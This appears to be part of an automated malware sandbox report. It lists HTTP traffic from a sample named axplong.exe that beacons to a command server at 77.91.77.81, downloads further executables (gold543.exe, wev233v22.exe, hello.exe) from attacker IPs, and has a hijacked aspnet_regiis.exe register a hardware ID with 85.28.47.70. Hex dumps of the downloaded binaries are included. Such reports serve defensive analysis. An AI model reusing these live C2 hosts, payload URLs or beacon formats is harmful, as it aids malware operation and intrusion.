                                                                                                                                                                                                                                        Last-Modified: Wed, 03 Jul 2024 15:26:48 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        ETag: "66856db8-117200"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fd 0a 19 31 b9 6b 77 62 b9 6b 77 62 b9 6b 77 62 6a 19 74 63 b2 6b 77 62 6a 19 72 63 12 6b 77 62 6a 19 73 63 ac 6b 77 62 7b ea 73 63 ab 6b 77 62 7b ea 74 63 ac 6b 77 62 6a 19 76 63 be 6b 77 62 b9 6b 76 62 39 6b 77 62 7b ea 72 63 ef 6b 77 62 4a e9 7e 63 b8 6b 77 62 4a e9 77 63 b8 6b 77 62 4a e9 88 62 b8 6b 77 62 4a e9 75 63 b8 6b 77 62 52 69 63 68 b9 6b 77 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 72 6a 85 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 86 02 00 00 f8 0e 00 00 00 00 00 59 b0 00 00 00 10 00 00 00 a0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1kwbkwbkwbjtckwbjrckwbjsckwb{sckwb{tckwbjvckwbkvb9kwb{rckwbJ~ckwbJwckwbJbkwbJuckwbRichkwbPELrjf'Y@@`AHA<@`.textxz `.BsS~ `.rdata@@.data|+P4@.rsrcP@@.reloc R@B
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.718712091 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 60 6a 51 00 e8 ce 68 00 00 68 2b 88 42 00 e8 ff a2 00 00 59 c3 6a 01 6a
                                                                                                                                                                                                                                        Data Ascii: `jQhh+BYjjhkQ0kQmh5BYVWjYkQQmjVkQXBqh?BY_^)kQm(kQUhhIBYh]BzYhSBnYjjh(lQlQ
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.718748093 CEST1236INData Raw: c2 08 00 32 c0 5e c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 04 8b 4c 24 08 89 08 c7 40 04 a8 63 51 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f0 81 ec 88 00 00 00 a1 40 50 43 00 33 c4 89 84 24 84 00 00 00 56 8b 75
                                                                                                                                                                                                                                        Data Ascii: 2^D$L$@cQU@PC3$VuWW)D$ D$0~D$4t$@vD$@v-wt$0L$4D$ [=v;BD$D$PD$$PZat$8D$D$<FPt$LL
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.718780994 CEST1236INData Raw: 00 00 83 c4 08 c7 06 a0 a3 42 00 8b c6 5e c2 04 00 f6 44 24 04 01 56 8b f1 c7 06 ac a3 42 00 74 0b 6a 04 56 e8 0e 97 00 00 83 c4 08 8b c6 5e c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 6a 00 8b f1 e8 4b 5f 00 00 33 c0 c7 46 04 00 00
                                                                                                                                                                                                                                        Data Ascii: B^D$VBtjV^VjK_3FfFFfF F$F(F,F0D$FFFFtPV6w^hCbVVWwF,tP&F,F$tPF$FtP
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.718816042 CEST896INData Raw: 5e 5b c2 0c 00 5f 8b c6 5e 5b c2 0c 00 53 56 8b 74 24 10 8b d9 57 8b 7c 24 18 3b f7 74 27 55 8b 6c 24 14 0f b7 06 8b cb 8b 13 50 55 8b 42 10 ff d0 84 c0 74 07 83 c6 02 3b f7 75 e7 5d 5f 8b c6 5e 5b c2 0c 00 5f 8b c6 5e 5b c2 0c 00 8d 41 08 50 ff
                                                                                                                                                                                                                                        Data Ascii: ^[_^[SVt$W|$;t'Ul$PUBt;u]_^[_^[APt$Vt$W|$;tSYSPf;u[_^APt$Vt$W|$;tSYSPf;
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.718849897 CEST1236INData Raw: ce 50 ff 74 24 10 57 e8 01 f3 ff ff 8b 4c 24 24 83 f9 0f 76 29 8b 54 24 10 41 8b c2 81 f9 00 10 00 00 72 10 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 77 25 51 52 e8 a8 8e 00 00 83 c4 08 8b 4c 24 3c 8b c6 5f c7 06 ec a3 42 00 5e 33 cc e8 4d 8e 00
                                                                                                                                                                                                                                        Data Ascii: Pt$WL$$v)T$ArP#+w%QRL$<_B^3M]UEAIV#t}t^]jj>tCCCDD$jP&L$PVh@CD$PVt$
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.718887091 CEST1236INData Raw: 18 0f b7 d0 8b c2 c1 e2 10 0b c2 d1 e9 f3 ab 13 c9 66 f3 ab 33 c0 66 89 44 5d 00 8b c6 5d 5f 5e 5b c2 08 00 e8 30 ed ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b f1 8b 4e 14 83 f9 0f 76 27 8b 06 41 81 f9 00 10 00 00 72 12 8b 50 fc
                                                                                                                                                                                                                                        Data Ascii: f3fD]]_^[0VNv'ArP#+wQPFF^S\$WWGGw%D$SPW_G;_[=v
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.718920946 CEST1236INData Raw: 00 66 0f 2f 05 e8 1e 43 00 76 41 8d 44 24 20 50 83 ec 08 f2 0f 11 0c 24 e8 18 00 01 00 8b 44 24 2c 83 c4 0c 99 dd d8 33 c2 8b 7c 24 44 2b c2 69 c8 97 75 00 00 b8 89 b5 f8 14 f7 e9 c1 fa 0d 8b c2 c1 e8 1f 03 c2 8b 54 24 40 03 f0 83 c6 32 3b f2 77
                                                                                                                                                                                                                                        Data Ascii: f/CvAD$ P$D$,3|$D+iuT$@2;wt$@D$0GD$00JL$D++;w$t$@t$0Gt$0WjV!>jWD$(L$8t$(WB<|$D|$0EG|$0D$ t$H$t$pD$djPt$4(PVW
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.718959093 CEST1236INData Raw: 8c 00 00 00 83 c4 30 8b c7 5f 5e 5b 33 cc e8 11 80 00 00 8b e5 5d c2 18 00 cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f0 83 ec 68 a1 40 50 43 00 33 c4 89 44 24 64 8a 45 18 56 8b 75 08 57 8b 7d 14 89 4c 24 10 89 74 24 1c 88 44 24 0c f7 47 14 00 40 00
                                                                                                                                                                                                                                        Data Ascii: 0_^[3]Uh@PC3D$dEVuW}L$t$D$G@u+EPt$WuuVR$_^L$d3]G0HL$PD$P*L$tRtj}L$@QtPP$(D$@w )D$ ~D$PfD$0D$0|
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:02.719594002 CEST1236INData Raw: 24 30 41 8b c2 81 f9 00 10 00 00 72 10 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 77 1f 51 52 e8 6f 7b 00 00 83 c4 08 8b 4c 24 5c 8b c6 5f 5e 33 cc e8 1a 7b 00 00 8b e5 5d c2 1c 00 e8 7b f9 00 00 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4
                                                                                                                                                                                                                                        Data Ascii: $0ArP#+wQRo{L$\_^3{]{UX@PC3D$TE3VuWL$W)D$0N0D$,t$T$@|$DT$00urD$D$$FvD$|tuupk3 uZM(


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        1192.168.2.54970577.91.77.81806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:04.782187939 CEST180OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 77.91.77.81
                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 30 30 31 36 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                        Data Ascii: d1=1000160001&unit=246122658369
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:05.517060041 CEST193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:06:05 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        2192.168.2.549706185.216.214.217806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:05.540261030 CEST66OUTGET /cdn-directory/gold543.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 185.216.214.217


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        3192.168.2.549721185.216.214.217806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:14.597671032 CEST66OUTGET /cdn-directory/gold543.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 185.216.214.217


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        4192.168.2.558969185.216.214.217806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:23.637501955 CEST66OUTGET /cdn-directory/gold543.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 185.216.214.217


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        5192.168.2.55897377.91.77.81806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:32.660417080 CEST180OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 77.91.77.81
                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 65 30 3d 31 30 30 30 31 39 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                        Data Ascii: e0=1000192001&unit=246122658369
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:33.362234116 CEST193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:06:33 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        6192.168.2.558974185.216.214.217806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:33.368908882 CEST68OUTGET /cdn-directory/wev233v22.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 185.216.214.217


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        7192.168.2.558975185.216.214.217806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:42.395057917 CEST68OUTGET /cdn-directory/wev233v22.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 185.216.214.217


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        8192.168.2.558976185.216.214.217806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:51.425934076 CEST68OUTGET /cdn-directory/wev233v22.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 185.216.214.217


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        9192.168.2.55897877.91.77.81806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:00.456748009 CEST180OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 77.91.77.81
                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 65 30 3d 31 30 30 30 31 39 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                        Data Ascii: e0=1000193001&unit=246122658369
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.157881975 CEST193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:01 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        10192.168.2.55897977.232.41.110806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.167506933 CEST54OUTGET /large/hello.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 77.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858057976 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:01 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 1115648
                                                                                                                                                                                                                                        Last-Modified: Fri, 12 Jul 2024 21:26:39 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        ETag: "66919f8f-110600"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1a 50 91 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 fa 10 00 00 0a 00 00 00 00 00 00 0e 18 11 00 00 20 00 00 00 20 11 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 11 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b8 17 11 00 53 00 00 00 00 20 11 00 e0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 11 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELPf @ `@S @ H.text `.rsrc @@.reloc@@BH@xcSfM]<NNd,N**\1e[EAj%A;AHp $U=5(OLiOdAwA0hiATA8A~A@A06AZKAx]$,3%dY6t4Qy_E1K/t@A+AA?A={H?K?jljn*xTeK@/nAGA.A}?AwANGAAzAA
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858108997 CEST1236INData Raw: 41 00 00 00 e9 79 41 cc 41 00 00 00 f0 9f 67 ba 41 65 9b a3 11 ea b7 e9 7d d4 ca e0 0f 00 00 00 00 cd e0 9c 3a fe 3f f7 62 48 7a 26 78 00 00 00 00 2b 93 00 08 00 00 00 00 ad 46 3c 61 00 00 00 00 66 b3 56 18 00 00 00 00 71 f2 79 7f 00 00 00 00 c2
                                                                                                                                                                                                                                        Data Ascii: AyAAgAe}:?bHz&x+F<afVqyAAMNON|`|^|Nr7~fJ"MU7MhDN#MKorAJ$ACAX<1\j,N]NN|N.N_b
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858148098 CEST448INData Raw: e4 9a e1 c5 41 00 00 00 7d a0 91 cf 41 00 00 80 61 69 e4 c2 41 00 00 40 ca 20 44 d5 41 00 00 c0 4c fc ac d3 41 29 6d bc 4e 86 c6 66 4d 01 2f 1b 4d 33 33 56 4d 22 8b fc 4e 00 00 00 00 e4 d6 d3 5e 00 00 00 00 7c 9e c4 68 00 00 00 00 30 df 57 5c 00
                                                                                                                                                                                                                                        Data Ascii: A}AaiA@ DALA)mNfM/M33VM"N^|h0W\MSAI@{HykX,AAAgO^A@BTA@ AC0A |{Z-}NrLA{NN2NNz*qLNK
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858181953 CEST1236INData Raw: 74 09 25 dc 41 00 00 40 cf 5e af d4 41 00 00 80 30 3a 03 c4 41 00 00 c0 80 a0 36 d2 41 9e a8 90 4e 07 6b e6 4e dd 65 bc 4e 00 00 00 00 36 d1 5d 6a 1e 3b 76 58 6a a6 51 1d 33 eb 0c 66 05 c5 fc 54 00 00 00 00 68 fb 86 7d 00 00 00 00 8e 78 c6 47 00
                                                                                                                                                                                                                                        Data Ascii: t%A@^A0:A6ANkNeN6]j;vXjQ3fTh}xGdN;2GVNNClNN6N7@U)22+I3NM@NWN#M|VxHoW|R3uMpNaN{
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858216047 CEST1236INData Raw: 41 00 00 80 25 9b ff cd 41 da 7d b0 45 b6 ae 22 39 2c 58 3c 5a 54 7a 90 6e c3 f5 51 0c 29 93 9f 77 1c 46 b8 3c 3c d5 85 28 00 00 c0 32 0b 8a de 41 00 00 00 57 a0 b0 bf 41 00 00 00 00 67 10 51 41 00 00 80 f7 cd 89 d2 41 99 59 71 3b 0f 22 eb 5e 44
                                                                                                                                                                                                                                        Data Ascii: A%A}E"9,X<ZTznQ)wF<<(2AWAgQAAYq;"^D)TuNONN{NVNdbN!/MN?Qw" J.cC4+hS[cNNNFN!N\AA*AkAOP5'V_>@S
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858248949 CEST1236INData Raw: 68 00 00 00 00 42 d8 33 04 34 20 18 3c 4b d9 b4 48 36 cd f8 63 aa f4 94 29 51 b8 97 09 ca f4 91 b1 42 78 b2 ad 70 d4 95 ee af 84 97 e4 38 60 6f 5d 5b f7 d2 8a 87 12 60 b4 4f 5c 92 3c 3e e7 5d 6f 93 6c 6b af 94 68 16 f6 ac e1 e9 eb b7 60 7c 99 4f
                                                                                                                                                                                                                                        Data Ascii: hB34 <KH6c)QBxp8`o][`O\<>]olkh`|O&;Qnzp|+K!=t!le|19b"7YIr5#}E{K<XDo5Z>BOvLUZ6AxJNa}e~@b%I3k}_x`JHg^Hk[
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858283997 CEST1236INData Raw: e4 93 94 cf 61 38 8a fe ff ff 16 13 09 20 0f 39 d0 7d 38 7d fe ff ff 28 13 00 00 0a 14 fe 06 04 00 00 06 73 14 00 00 0a 6f 15 00 00 0a 11 0c 20 1b 1c 78 bb 5a 20 ff 0d 93 cb 61 38 54 fe ff ff 11 06 1f 0c 11 06 1f 0c 95 08 1f 0c 95 61 9e 11 0c 20
                                                                                                                                                                                                                                        Data Ascii: a8 9}8}(so xZ a8Ta Z -ra822 )N%+ #gYo%&8a TzZ ja8a Z Ya8aa ^v=Z Wea8X u
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858316898 CEST1236INData Raw: 00 04 07 20 83 69 ee c1 5a 20 81 51 17 6f 61 38 44 ff ff ff 03 25 7b 07 00 00 04 1e 62 7d 07 00 00 04 07 20 b0 5e e1 dd 5a 20 31 36 6e 75 61 38 24 ff ff ff 03 25 7b 07 00 00 04 1e 62 7d 07 00 00 04 07 20 3f 0d f9 01 5a 20 ff 95 e4 0a 61 38 04 ff
                                                                                                                                                                                                                                        Data Ascii: iZ Qoa8D%{b} ^Z 16nua8$%{b} ?Z a8{b{o`} 3Z Ua8* ,E8{ {YdX}{ 7 =F%+ *j}%& AlZa8} ]Z 1a8n*0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858350992 CEST1236INData Raw: 19 61 38 75 ff ff ff 02 15 7d 07 00 00 04 07 20 55 8e fc de 5a 20 5b 2f ba 81 61 38 5c ff ff ff 2a 13 30 04 00 08 00 00 00 01 00 00 11 02 14 7d 08 00 00 04 2a 13 30 05 00 8d 00 00 00 01 00 00 11 2b 69 20 6b d7 49 04 20 68 a0 e9 7d 61 25 0a 1b 5e
                                                                                                                                                                                                                                        Data Ascii: a8u} UZ [/a8\*0}*0+i kI h}a%^E$Ab+`{b{o`} N+{b} owZ a+{ 4 kI%+ 0_|q%&8{*00{{ ?C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858387947 CEST1236INData Raw: 00 00 79 01 00 00 8f 01 00 00 07 01 00 00 57 02 00 00 22 02 00 00 87 ff ff ff ad 00 00 00 f6 01 00 00 9b 00 00 00 f1 00 00 00 42 00 00 00 29 00 00 00 d4 00 00 00 0a 02 00 00 5f 00 00 00 82 00 00 00 d9 01 00 00 19 01 00 00 34 01 00 00 86 02 00 00
                                                                                                                                                                                                                                        Data Ascii: yW"B)_48{{o( dZ ea8cr7 $%+ fp%&8J{6 $ho%+ %&8-{( |Z a87 S%+ A%&8
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.863636017 CEST1236INData Raw: 9b 38 1c fe ff ff 11 05 17 6a 58 13 05 11 0f 20 7d 1b f2 00 5a 20 3b 22 88 3e 61 38 02 fe ff ff 11 05 11 06 34 08 20 5f 33 e7 ec 25 2b 06 20 e1 53 95 ec 25 26 38 e8 fd ff ff 02 7b 0c 00 00 04 06 7b 2b 00 00 04 8f 02 00 00 02 02 7b 14 00 00 04 28
                                                                                                                                                                                                                                        Data Ascii: 8jX }Z ;">a84 _3%+ S%&8{{+{(, EB%+ cE'%& Za8{YobX 83 S%+ %&8wn4 %+ %&8](2 Z ]udba8C(1 P pZ Y


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        11192.168.2.55898077.91.77.81806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:03.629035950 CEST180OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 77.91.77.81
                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 30 30 32 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                        Data Ascii: d1=1000202001&unit=246122658369
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:04.317310095 CEST193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:04 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        12192.168.2.55898185.28.47.70807464C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:03.747293949 CEST410OUTPOST /570d5d5e8678366c.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----AFIDGDBGCAAFIDHIJKEH
                                                                                                                                                                                                                                        Host: 85.28.47.70
                                                                                                                                                                                                                                        Content-Length: 212
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 30 43 44 32 46 36 44 46 42 35 45 31 35 37 33 35 33 32 31 30 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 68 65 6c 6c 6f 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 2d 2d 0d 0a
                                                                                                                                                                                                                                        Data Ascii: ------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="hwid"F0CD2F6DFB5E1573532102------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="build"hello------AFIDGDBGCAAFIDHIJKEH--
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:04.372945070 CEST384INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:04 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
